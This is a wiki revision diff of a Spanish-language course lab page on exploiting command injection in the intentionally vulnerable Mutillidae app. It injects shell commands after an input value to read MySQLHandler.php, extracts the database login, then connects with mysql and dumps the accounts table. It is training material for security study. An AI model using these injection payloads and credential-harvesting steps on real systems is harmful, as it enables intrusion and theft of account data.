Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anterior Revisión previa Próxima revisión | Revisión previa | ||
sad:fedora14:p2 [2018/01/24 15:32] José Manuel Guallar |
sad:fedora14:p2 [2018/01/24 15:37] José Manuel Guallar |
||
---|---|---|---|
Línea 157: | Línea 157: | ||
Hemos hecho parte del trabajo, porque ahora tenemos la contraseña "samurai", que está en el fichero MYSQLHandler.php pero no sabemos el usuario que utiliza esa contraseña, por lo que vamos a buscar en MySQLHandler.php las palabras usuario (user) o login | Hemos hecho parte del trabajo, porque ahora tenemos la contraseña "samurai", que está en el fichero MYSQLHandler.php pero no sabemos el usuario que utiliza esa contraseña, por lo que vamos a buscar en MySQLHandler.php las palabras usuario (user) o login | ||
+ | <code bash> | ||
www.colegiomontessori.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "=" | www.colegiomontessori.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "=" | ||
+ | </code> | ||
{{:sad:fedora:p2:13.png?500|}} | {{:sad:fedora:p2:13.png?500|}} | ||
Línea 163: | Línea 165: | ||
Nos da mucha información, por un lado nos dice que el usuario es root y por otro lado como php se conecta y autentifica con MySQL, eso lo podemos ver en las lisneas $this->mMySQLConnection _... | Nos da mucha información, por un lado nos dice que el usuario es root y por otro lado como php se conecta y autentifica con MySQL, eso lo podemos ver en las lisneas $this->mMySQLConnection _... | ||
- | Mostrar MySQLHandler.php | + | **Mostrar MySQLHandler.php** |
Creo que podría haberte mostrado esto primero, pero las cosas buenas llegan a los que esperan. | Creo que podría haberte mostrado esto primero, pero las cosas buenas llegan a los que esperan. | ||
- | Es posible visualizar los contenidos del programa MySQLHandler.php, codificando las etiquetas "<? Php" y "?>". Estas etiquetas le dicen a Apache que ejecute un script php. | + | Es posible visualizar los contenidos del programa** MySQLHandler.php**, codificando las etiquetas "<? Php" y "?>". Estas etiquetas le dicen a Apache que ejecute un script php. |
Para evitar este problema y simplemente mostrar el texto del programa, cambiamos "<" a "& # 60;" y ">" a "& # 62;". | Para evitar este problema y simplemente mostrar el texto del programa, cambiamos "<" a "& # 60;" y ">" a "& # 62;". | ||
+ | <code bash> | ||
www.colegiomontessor.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\</g' | sed 's/>/\>/g' | www.colegiomontessor.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\</g' | sed 's/>/\>/g' | ||
+ | </code> | ||
{{:sad:fedora:p2:14.png?500|}} | {{:sad:fedora:p2:14.png?500|}} | ||
Línea 177: | Línea 180: | ||
Aqui sacamos mucha mucha información LOLLOL por un lado "root" el usuario de la base de datos, por otro lado "samurai" la contraseña de la base de datos y por ultimo "nowasp" el nombre de la base de datos | Aqui sacamos mucha mucha información LOLLOL por un lado "root" el usuario de la base de datos, por otro lado "samurai" la contraseña de la base de datos y por ultimo "nowasp" el nombre de la base de datos | ||
+ | <code mysql> | ||
static public $mMySQLDatabaseUsername = "root"; | static public $mMySQLDatabaseUsername = "root"; | ||
Línea 183: | Línea 186: | ||
static public $mMySQLDatabaseName = "nowasp"; | static public $mMySQLDatabaseName = "nowasp"; | ||
+ | </code> | ||
- | Ahora podemos ir al terminal de nuestro Backtrack | + | Ahora podemos ir al terminal de nuestro **Backtrack** |
+ | <code bash> | ||
root@bt:~# mysql -h 192.168.153.39 -uroot -psamurai | root@bt:~# mysql -h 192.168.153.39 -uroot -psamurai | ||
mysql> show databases; | mysql> show databases; | ||
mysql> use nowasp; | mysql> use nowasp; | ||
+ | </code> | ||
{{:sad:fedora:p2:15.png?500|}} | {{:sad:fedora:p2:15.png?500|}} | ||
- | Ahora vamos a nevegar por la tablas | + | ====== A nevegar por la tablas ====== |
Basicamente vamos a mirar que tablas contienen información del usuario y de la contraseña | Basicamente vamos a mirar que tablas contienen información del usuario y de la contraseña | ||
Línea 198: | Línea 204: | ||
{{:sad:fedora:p2:16.png?500|}} | {{:sad:fedora:p2:16.png?500|}} | ||
+ | <code mysql> | ||
mysql> select * from accounts; | mysql> select * from accounts; | ||
mysql> quit; | mysql> quit; | ||
+ | </code> | ||
{{:sad:fedora:p2:17.png?500|}} | {{:sad:fedora:p2:17.png?500|}} | ||
+ | |||
**''Print de pantalla a entregar''** | **''Print de pantalla a entregar''** |